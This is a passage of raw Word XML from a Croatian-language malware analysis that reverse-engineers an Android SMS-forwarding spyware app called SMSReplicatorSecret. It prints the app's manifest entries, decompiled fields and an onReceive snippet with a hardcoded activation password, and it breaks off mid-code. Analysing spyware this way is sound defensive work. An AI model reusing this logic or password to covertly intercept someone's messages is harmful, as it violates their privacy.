    </w:p>
    <w:p w:rsidR="003B3FE8" w:rsidRPr="003B3FE8" w:rsidRDefault="003B3FE8" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Prvi korak rukovanjem programom je analiza datoteke </w:t>
      </w:r>
      <w:r w:rsidRPr="003B3FE8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AndroidManifest.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> koja se obavezno nalazi u svakom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.apk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> paketu.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Na</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> njoj se, uz osjetljiva dopuštenja koja su se prethodno prikazala, očita i glavna aktivnost.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> U ovom specifičnom s</w:t>
      </w:r>
      <w:r w:rsidR="00C7194A">
        <w:t>lučaju navedena je aktivnost i primatelj</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="00E37AF2" w:rsidRDefault="00C7194A" w:rsidP="00C7194A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
        <w:t>&lt;activity android:label="@string/app_name" android:name=".SMSReplicatorSecret"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="00E37AF2" w:rsidRDefault="00C7194A" w:rsidP="00C7194A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
        <w:t>&lt;intent-filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="00E37AF2" w:rsidRDefault="00C7194A" w:rsidP="00C7194A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
        <w:t>&lt;action android:name="android.intent.action.MAIN" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="00E37AF2" w:rsidRDefault="00C7194A" w:rsidP="00C7194A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
        <w:t>&lt;/intent-filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="00E37AF2" w:rsidRDefault="00C7194A" w:rsidP="00C7194A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
        <w:t>&lt;/activity&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="00E37AF2" w:rsidRDefault="00C7194A" w:rsidP="00C7194A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
        <w:t>&lt;receiver android:name=".SMSReceiver"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="00E37AF2" w:rsidRDefault="00C7194A" w:rsidP="00C7194A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
        <w:t>&lt;intent-filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="00E37AF2" w:rsidRDefault="00C7194A" w:rsidP="00C7194A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
        <w:t>&lt;action android:name="android.provider.Telephony.SMS_RECEIVED" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="00E37AF2" w:rsidRDefault="00C7194A" w:rsidP="00C7194A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
        <w:t>&lt;/intent-filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRPr="00E37AF2" w:rsidRDefault="00C7194A" w:rsidP="001730B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
        <w:t>&lt;/receiver&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRPr="00E37AF2" w:rsidRDefault="001730B1" w:rsidP="00C7194A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="984806"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRDefault="00C7194A" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Dakle, glavna aktivnost aplikacije je </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SMSReplicatorSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, a primatelj je </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SMSReceiver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> kojemu je akcija </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>android.provider.Telephony.SMS_RECEIVED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. Budući da program nema ikone na uređaju, a nema ni otvorenih procesa, sljedeću korak je analiziranje klase </w:t>
      </w:r>
      <w:r w:rsidRPr="00C7194A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SMSReplicatorSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, za koju je iz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Manifesta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> vidljivo da „sluša” primljene poruku, da se dozna može li se i pod kojim uvjetima doći do upravljanja programom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRDefault="001730B1" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRDefault="00B35A13" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="3456940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="Slika 26" descr="Rekonstruirani java izvorni k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konstruirani java izvorni k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7545" cy="3456940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRPr="001730B1" w:rsidRDefault="00D478BF" w:rsidP="001730B1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 4.14</w:t>
      </w:r>
      <w:r w:rsidR="001730B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Rekonstruirani .java izvorni kod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRPr="00C7194A" w:rsidRDefault="001730B1" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="00C7194A" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Budući da APKinspector nudi i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> datoteke iz kojih je najlakše razumjeti što se u kodu događa, otvorit će se </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SMSReceiver.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> te će se krenuti s detaljnom analizom. Može se krenuti s dostupnim atributima, a oni su sljedeći:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="0086242F" w:rsidRDefault="00C7194A" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7194A">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>String DB_ui_pass;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="0086242F" w:rsidRDefault="00C7194A" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    String DBactivate;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="0086242F" w:rsidRDefault="00C7194A" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    String DBforwardingNo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="0086242F" w:rsidRDefault="00C7194A" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    Activity aa;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="0086242F" w:rsidRDefault="00C7194A" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    Context ct;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="0086242F" w:rsidRDefault="00C7194A" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    String msg;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRPr="0086242F" w:rsidRDefault="00C7194A" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    String str;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRDefault="00C7194A" w:rsidP="00C7194A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C7194A" w:rsidRDefault="00C7194A" w:rsidP="00C7194A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FC73EB">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Dakle, dobiju se tr</w:t>
      </w:r>
      <w:r w:rsidR="009C6405">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>i String atributa koja su vjeroj</w:t>
      </w:r>
      <w:r w:rsidR="00FC73EB">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>atno povezana s nekom bazom podataka budući da im ime sadrži DB (engl. Database), atribut aktivnosti i kon</w:t>
      </w:r>
      <w:r w:rsidR="003F497D">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00FC73EB">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">eksta. Sljedeći je pretpostavljeno važan atribut String kojemu je ime </w:t>
      </w:r>
      <w:r w:rsidR="00FC73EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
      <w:r w:rsidR="00FC73EB">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> što upućuje da bi se u njemu mogla spremiti poruka dok je posljednji atribut String imena </w:t>
      </w:r>
      <w:r w:rsidR="00FC73EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidR="00FC73EB">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koji ne daje naznaku razloga korištenja.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRDefault="00FC73EB" w:rsidP="00C7194A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>Prilikom stvaranja razreda uoči se da svi atributi ne poprimaju nikakvu određenu vrijednost:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC73EB">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>public SMSReceiver()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        DBforwardingNo = "";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        DBactivate = "";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        DB_ui_pass = "";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        str = "";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        msg = "";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRDefault="00FC73EB" w:rsidP="00FC73EB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRDefault="00FC73EB" w:rsidP="00FC73EB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Sljedeća metoda u razredu je </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>public void onReceive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koja upućuje na to da se izvršava prilikom primitka SMS poruke pa se krene s analizom te metode. Analitičara prvenstveno interesira mjesto pokretanja glavne aktivnosti programa, odnosno razreda </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SMSReplicatorSecret.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. Utipkavanjem riječi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SMSReplicatorSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> dođe se do sljedećeg odsječka koda:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msg.equalsIgnoreCase(DB_ui_pass) || msg.equalsIgnoreCase("red4life")</w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="948A54"/>
        </w:rPr>
        <w:t>Intent intent1 = new Intent(context, com/dlp/SMSReplicatorSecret</w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E37AF2">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="17365D"/>
        </w:rPr>
        <w:t>SMSReplicatorSecret</w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                intent1.addFlags(0x10000000);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
